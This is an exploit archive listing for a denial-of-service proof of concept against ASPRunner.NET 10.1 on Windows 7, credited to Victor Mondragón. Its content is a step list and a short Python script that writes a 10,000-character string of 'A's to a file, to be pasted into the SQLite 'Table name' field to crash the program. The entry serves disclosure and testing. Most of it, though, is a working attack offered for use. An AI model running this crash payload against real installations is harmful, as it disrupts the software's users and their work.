ASPRunner.NET 10.1 - Denial of Service Exploit

2019-05-10T00:00:00
ID 1337DAY-ID-32695
Type zdt
Reporter Victor Mondragón
Modified 2019-05-10T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            #Exploit Title:  ASPRunner.NET 10.1 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Vendor Homepage: https://xlinesoft.com/
#Software Link: https://xlinesoft.com/asprunnernet/download.htm
#Tested Version: 10.1
#Tested on: Windows 7 Service Pack 1 x64 

#Steps to produce the crash:
#1.- Run python code: ASPRunner_net_10_1.py
#2.- Open ASPRunner_10_1.txt and copy content to clipboard
#3.- Open ASPRunner.NET
#4.- Click on "Next" > Select "SQLite" database > click on "Next"
#5.- Click on "Create new database" 
#6.- In "Table name" field Paste Clipboarad
#7.- Click on "Create table"
#8.- Crashed

cod = "\x41" * 10000
f = open('ASPRunner_10_1.txt', 'w')
f.write(cod)
f.close()

#  0day.today [2019-05-16]  #